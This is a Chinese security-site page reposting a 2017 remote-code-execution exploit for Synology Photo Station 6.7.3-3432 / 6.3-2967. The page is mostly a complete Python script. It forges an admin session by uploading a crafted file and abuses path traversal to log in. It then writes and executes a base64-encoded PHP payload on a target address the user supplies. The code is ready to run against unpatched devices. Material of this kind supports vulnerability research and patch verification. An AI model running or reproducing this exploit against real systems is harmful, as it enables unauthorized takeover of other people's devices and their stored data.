首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Synology Photo Station 6.7.3-3432 / 6.3-2967 - Remote Code Execution
来源:https://blogs.securiteam.com 作者:Szurek 发布时间:2017-08-09  
'''
Source: https://blogs.securiteam.com/index.php/archives/3356
 
Vulnerability details
The remote code execution is a combination of 4 different vulnerabilities:
 
Upload arbitrary files to the specified directories
Log in with a fake authentication mechanism
Log in to Photo Station with any identity
Execute arbitrary code by authenticated user with administrator privileges
The chain of vulnerabilities will allow you, in the end, to execute code as:
 
uid=138862(PhotoStation) gid=138862(PhotoStation) groups=138862(PhotoStation)
'''
import requests
 
# What server you want to attack
synology_ip = 'http://192.168.1.100'
 
# Your current IP
ip = '192.168.1.200'
 
# PHP code you want to execute
php_to_execute = '<?php echo system("id"); ?>'
 
encoded_session = 'root|a:2:{s:19:"security_identifier";s:'+str(len(ip))+':"'+ip+'";s:15:"admin_syno_user";s:7:"hlinak3";}'
 
print "[+] Set fake admin sesssion"
file = [('file', ('foo.jpg', encoded_session))]
 
r = requests.post('{}/photo/include/synotheme_upload.php'.format(synology_ip), data = {'action':'logo_upload'}, files=file)
print r.text
 
print "[+] Login as fake admin"
 
# Depends on version it might be stored in different dirs
payload = {'session': '/../../../../../var/packages/PhotoStation/etc/blog/photo_custom_preview_logo.png'}
# payload = {'session': '/../../../../../var/services/photo/@eaDir/SYNOPHOTO_THEME_DIR/photo_custom_preview_logo.png'}
 
try_login = requests.post('{}/photo/include/file_upload.php'.format(synology_ip), params=payload)
 
whichact = {'action' : 'get_setting'}
r = requests.post('{}/photo/admin/general_setting.php'.format(synology_ip), data=whichact, cookies=try_login.cookies)
print r.text
 
print "[+] Upload php file"
 
c = {'action' : 'save', 'image' : 'data://text/plain;base64,'+php_to_execute.encode('base64'), 'path' : '/volume1/photo/../../../volume1/@appstore/PhotoStation/photo/facebook/exploit'.encode("base64"), 'type' : 'php'}
r = requests.post('{}/photo/PixlrEditorHandler.php'.format(synology_ip), data=c, cookies=try_login.cookies)
print r.text
 
 
print "[+] Execute payload"
f = requests.get('{}/photo/facebook/exploit.php'.format(synology_ip))
 
print f.text
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·DALIM SOFTWARE ES Core 5.0 Bui
·Microsoft Windows 7 SP1 x86 -
·Microsoft Windows - LNK Shortc
·DNSTracer 1.9 - Buffer Overflo
·SMBLoris Denial Of Service
·Hashicorp vagrant-vmware-fusio
·Solarwinds Kiwi Syslog 9.6.1.6
·Nitro Pro PDF Reader 11.0.3.17
·Microsoft Windows LNK Shortcut
·Advantech SUSIAccess <= 3.0 -
·Advantech SUSIAccess <= 3.0 -
·DiskBoss Enterprise 8.2.14 - B
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved